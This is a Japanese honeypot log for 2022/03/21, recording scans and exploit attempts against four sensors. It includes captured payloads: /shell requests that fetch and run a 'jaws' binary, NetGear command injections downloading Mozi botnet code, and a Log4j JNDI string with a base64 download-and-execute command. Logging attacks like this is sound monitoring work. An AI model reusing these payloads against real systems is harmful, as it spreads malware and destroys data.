ハニーポット(仮) 観測記録 2022/03/21分です。
特徴
共通
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
/.envへのスキャン行為
Location:JP
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 31.210.20.109/jaws; sh /tmp/jaws
Location:US
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 31.210.20.109/jaws; sh /tmp/jaws
Location:UK
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 31.210.20.109/jaws; sh /tmp/jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:73 (前日比:-102)
US:総アクセス数:52 (前日比:-154)
UK:総アクセス数:49 (前日比:8)
SG:総アクセス数:68 (前日比:-23)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.25.12.34 | United States |
| 1 | 34.77.77.185 | United States |
| 2 | 37.0.8.109 | Netherlands |
| 1 | 42.230.34.206 | China |
| 1 | 45.83.64.3 | Germany |
| 1 | 45.137.21.208 | Bangladesh |
| 1 | 46.100.49.154 | Iran |
| 1 | 47.103.66.91 | China |
| 3 | 52.168.78.8 | United States |
| 1 | 61.224.13.123 | Taiwan |
| 1 | 69.162.231.221 | United States |
| 1 | 89.163.204.9 | Germany |
| 16 | 95.214.235.205 | Ukraine |
| 1 | 103.162.30.101 | Vietnam |
| 2 | 109.237.103.118 | Russia |
| 1 | 109.237.103.123 | Russia |
| 8 | 135.125.217.54 | France |
| 6 | 135.125.244.48 | France |
| 1 | 137.184.45.98 | United States |
| 2 | 142.147.99.132 | Canada |
| 1 | 143.110.212.131 | United States |
| 2 | 154.21.23.120 | United States |
| 1 | 154.113.156.166 | Nigeria |
| 2 | 157.245.70.127 | United States |
| 1 | 164.92.89.140 | United States |
| 8 | 185.254.196.217 | Ukraine |
| 1 | 193.3.19.134 | Russia |
| 2 | 194.31.98.117 | Netherlands |
| 1 | 194.31.98.168 | Netherlands |
| 2 | 212.192.246.29 | Czechia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 7 | - |
| 1 | Go-http-client/1.1 |
| 2 | Hello, world |
| 4 | Mozila/5.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.44 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 |
| 49 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178[.]62[.]196[.]118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY3VybCAtTyBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY2htb2QgNzc3IDhVc0EyLnNoOyBzaCA4VXNBMi5zaDsgcm0gLXJmICo=}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 1 | \x16\x03\x01\x01\xfa\x01 |
||
| 51 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /:undefined |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 2 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//42[.]230[.]34[.]206:42986/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//61[.]224[.]24[.]37:46129/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+31[.]210[.]20[.]109/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
| 1 | POST | /GO/1.php |
HTTP/1.1 |
| 4 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/index2.asp |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.114.125.148 | United States |
| 1 | 34.76.238.0 | United States |
| 8 | 39.103.170.113 | China |
| 1 | 45.83.67.229 | Germany |
| 1 | 45.137.21.166 | Bangladesh |
| 7 | 45.146.165.37 | Russia |
| 2 | 45.227.254.48 | Belize |
| 1 | 100.2.73.183 | United States |
| 1 | 109.237.103.123 | Russia |
| 1 | 125.127.53.40 | China |
| 1 | 137.184.45.98 | United States |
| 1 | 143.198.235.58 | United States |
| 2 | 157.245.70.127 | United States |
| 2 | 159.223.130.128 | United States |
| 1 | 159.223.238.205 | United States |
| 1 | 162.142.125.213 | United States |
| 1 | 167.248.133.44 | United States |
| 1 | 172.105.77.209 | United States |
| 2 | 172.245.45.215 | United States |
| 4 | 185.142.236.43 | Seychelles |
| 7 | 185.254.196.223 | Ukraine |
| 1 | 192.241.212.102 | United States |
| 3 | 194.31.98.117 | Netherlands |
| 1 | 194.242.56.116 | Germany |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 14 | - |
| 1 | Hello, world |
| 1 | Java/1.8.0_321 |
| 4 | Mozila/5.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 |
| 13 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 4 | Mozilla/5.0 (compatible;) |
| 1 | Mozilla/5.0 zgrab/0.x |
| 2 | curl/7.75.0 |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178[.]62[.]196[.]118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY3VybCAtTyBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY2htb2QgNzc3IDhVc0EyLnNoOyBzaCA4VXNBMi5zaDsgcm0gLXJmICo=}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 |
||
| 1 | \x16\x03\x01\x01\xfb\x01 |
||
| 2 | \x16\x03\x01\x02 |
||
| 1 | CONNECT | api1pdts[.]movistar[.]es:443 |
HTTP/1.1 |
| 13 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /0bef |
HTTP/1.0 |
| 1 | GET | /:undefined |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /HNAP1 |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /evox/about |
HTTP/1.1 |
| 3 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+31[.]210[.]20[.]109/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /text4041647759036 |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | POST | /GO/1.php |
HTTP/1.1 |
| 4 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /sdk |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.125.35.66 | United States |
| 1 | 34.140.79.160 | United States |
| 1 | 35.187.119.82 | United States |
| 1 | 36.2.202.8 | Japan |
| 1 | 37.0.8.109 | Netherlands |
| 1 | 45.83.65.157 | Germany |
| 1 | 45.137.21.166 | Bangladesh |
| 4 | 45.146.165.37 | Russia |
| 1 | 103.162.30.101 | Vietnam |
| 1 | 106.75.173.98 | China |
| 1 | 109.237.103.9 | Russia |
| 2 | 109.237.103.38 | Russia |
| 2 | 109.237.103.118 | Russia |
| 1 | 109.237.103.123 | Russia |
| 1 | 116.230.71.139 | China |
| 8 | 121.89.209.22 | China |
| 1 | 122.235.219.195 | China |
| 1 | 124.191.130.141 | Australia |
| 1 | 136.144.41.16 | Netherlands |
| 1 | 137.184.45.98 | United States |
| 1 | 138.68.231.58 | United States |
| 2 | 157.245.70.127 | United States |
| 1 | 167.248.133.62 | United States |
| 1 | 173.63.188.95 | United States |
| 1 | 183.136.225.42 | China |
| 4 | 185.142.236.43 | Seychelles |
| 1 | 192.241.214.208 | United States |
| 3 | 194.31.98.117 | Netherlands |
| 2 | 194.165.16.11 | Panama |
| 1 | 209.17.96.226 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 16 | - |
| 2 | Hello, world |
| 3 | Mozila/5.0 |
| 2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
| 5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 4 | Mozilla/5.0 (compatible;) |
| 1 | Mozilla/5.0 zgrab/0.x |
| 2 | curl/7.75.0 |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178[.]62[.]196[.]118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY3VybCAtTyBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY2htb2QgNzc3IDhVc0EyLnNoOyBzaCA4VXNBMi5zaDsgcm0gLXJmICo=}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 |
||
| 1 | \x16\x03\x01\x01C\x01 |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 3 | \x16\x03\x01\x02 |
||
| 1 | \x16\x03\x01 |
||
| 7 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /:undefined |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /HNAP1 |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
| 2 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /evox/about |
HTTP/1.1 |
| 5 | GET | /favicon.ico |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//116[.]230[.]71[.]139:58271/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+31[.]210[.]20[.]109/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /text4041647746029 |
HTTP/1.1 |
| 2 | POST | /GO/1.php |
HTTP/1.1 |
| 3 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /sdk |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.89.95.126 | United States |
| 1 | 20.125.35.66 | United States |
| 1 | 35.187.119.82 | United States |
| 3 | 38.68.46.20 | United States |
| 1 | 45.77.239.190 | United States |
| 1 | 45.83.65.67 | Germany |
| 1 | 45.137.21.166 | Bangladesh |
| 1 | 45.137.21.208 | Bangladesh |
| 8 | 45.146.165.37 | Russia |
| 2 | 45.227.254.53 | Belize |
| 1 | 89.163.204.9 | Germany |
| 1 | 103.162.30.101 | Vietnam |
| 2 | 109.237.103.118 | Russia |
| 1 | 109.237.103.123 | Russia |
| 1 | 124.223.216.102 | China |
| 1 | 137.184.45.98 | United States |
| 1 | 138.197.155.136 | United States |
| 1 | 139.59.165.170 | Singapore |
| 1 | 146.148.28.98 | United States |
| 3 | 154.209.72.223 | Seychelles |
| 4 | 157.230.216.203 | United States |
| 1 | 159.223.130.128 | United States |
| 1 | 161.35.213.143 | United States |
| 1 | 162.142.125.9 | United States |
| 1 | 162.142.125.219 | United States |
| 1 | 162.142.125.220 | United States |
| 1 | 172.105.77.209 | United States |
| 2 | 172.245.45.215 | United States |
| 9 | 185.172.110.211 | Australia |
| 1 | 185.220.100.253 | Germany |
| 8 | 185.254.196.223 | Ukraine |
| 2 | 194.31.98.117 | Netherlands |
| 1 | 209.17.96.66 | United States |
| 2 | 212.192.246.29 | Czechia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 22 | - |
| 1 | Go-http-client/1.1 |
| 4 | Mozila/5.0 |
| 1 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 |
| 18 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178[.]62[.]196[.]118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY3VybCAtTyBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY2htb2QgNzc3IDhVc0EyLnNoOyBzaCA4VXNBMi5zaDsgcm0gLXJmICo=}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 1 | \x16\x03\x01\x01\xfb\x01 |
||
| 1 | \x16\x03\x01 |
||
| 20 | GET | /.env |
HTTP/1.1 |
| 1 | GET | //PMA/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | //admin/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | //dbadmin/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | //mysql/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | //pma/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | //webdav/wickd.php |
HTTP/1.1 |
| 1 | GET | /0bef |
HTTP/1.0 |
| 1 | GET | /:undefined |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 2 | GET | /ab2g |
HTTP/1.1 |
| 2 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 3 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /muieblackcat |
HTTP/1.1 |
| 2 | GET | /phpmyadmin/index.php |
HTTP/1.1 |
| 1 | GET | /phpmyadmin4.8.5/index.php |
HTTP/1.1 |
| 1 | GET | /pmd/index.php |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 2 | POST | /GO/1.php |
HTTP/1.1 |
| 4 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /onvif/index |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 3 | PRI | * |
HTTP/2.0 |
